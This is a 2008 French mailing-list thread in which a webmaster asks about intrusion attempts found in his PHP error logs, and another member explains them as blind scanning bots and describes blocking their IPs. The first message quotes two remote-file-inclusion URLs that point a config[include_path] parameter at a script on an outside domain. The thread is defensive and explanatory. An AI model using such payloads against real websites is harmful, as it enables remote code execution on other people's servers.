En gros tu blacklists l'ip pendant quelques heures ?

Le 02/04/08, neofutur<[EMAIL PROTECTED]> a écrit :
>  oui, ce sont des robots de recherche de failles, des requetes de ce
>  genre j'en ai des milliers chaque jour sur mes serveurs, au point que
>  generalement il y a plus de charge en provenance des robotsd qu'en
>  provenance des visiteurs reels.
>
>   En general ces robots testent des failles connues pour un cms (
>  joomla, phpbb . .. . ) mais en aveugle, ils cherchent la faille sur
>  tous les sites du web sans chercher a savoir si le site web possede le
>  logiciel concerne par la faille.
>   D'une maniere generale tu ne risque rien.si ton site web n'utilise
>  pas le logiciel concerne par la faille recherchée, le seul vrai risque
>  est pour l'hebergeur de ton site qui, s'il heberge des dizaines de
>  sites web sur un meme serveur, risque d'etre surcharge par des
>  dizaines de requetes de ce genre a la minute.
>   Sur certains de mes serveurs j'ai du en arriver a creer des
>  expressions regulieres qui detectent dce genre de requetres bidon pour
>  ensuite dropper reguilierement les adresses ips utilisees par ces
>  robots, sans quoi ils generent tellement de charge sur le serveur que
>  les sites peuvent etre injoignables  pour les vrais utilisateurs.
>
>  Le 02/04/08, Yann Cochard<[EMAIL PROTECTED]> a écrit :
>
> > Bonjour,
>  >
>  >  Sur mon site en PHP, je repère des tentatives d'intrusion / prise de
>  >  contrôle / récupération de données sensibles. Elles n'ont pas l'air
>  >  efficaces (c'est pour ça que j'en ai connaissance d'ailleurs : j'ai un
>  >  log d'erreur), et se font par massage de paramètres.
>  >  Exemple :
>  >  
> http://monsite/config_settings.php?config[include_path]=http://www.health-nutrition-business.com/echo.txt?
>  >  ou même :
>  >  
> http://monsite/mapage.html/config_settings.php?config[include_path]=http://www.health-nutrition-business.com/echo.txt?
>  >  Comme je n'ai pas de page config_settings.php et que mes pages ne
>  >  prennent pas les paramètres de cette manière, ça ne marche pas... o_O
>  >  Pour voir le contenu du script que l'attaquant essaie de faire
>  >  tourner, voyez ce fichier texte :
>  >  http://www.health-nutrition-business.com/echo.txt
>  >
>  >  La question que je me pose : ces attaques sont-elles conçus pour des
>  >  programmes PHP connus (par exemple phpBB), ou bien peuvent-elles
>  >  fonctionner sur du code maison ?
>  >  Comment s'en prémunir ?
>  >
>  >  Merci
>  >  Yann
>  >
>  > --
>  >  _________________________________________________________________
>  >  Kaella, distribution Linux live-cd : http://kaella.linux-azur.org
>  >
>  >  Diffusez cette liste aupres de vos relations :)
>  >      Linux Azur : http://linux-azur.org
>  >  L'auteur du post est responsable de ses écrits !
>  >  *** Pas de message SMS, HTML ni de PJ SVP ***
>  >
>
>
>
> --
>  Cordialement
>
>   William Waisse
>   http://waisse.org | http://neoskills.com
>    http://cahierspip.ww7.be | http://feeder.ww7.be
>
>  carte de visite : http://xena.ww7.be/my_carte2.jpg
>
>
>  Diffusez cette liste aupres de vos relations :)
>      Linux Azur : http://linux-azur.org
>  L'auteur du post est responsable de ses écrits !
>  *** Pas de message SMS, HTML ni de PJ SVP ***
>

Diffusez cette liste aupres de vos relations :)
     Linux Azur : http://linux-azur.org
L'auteur du post est responsable de ses écrits !
*** Pas de message SMS, HTML ni de PJ SVP ***

Répondre à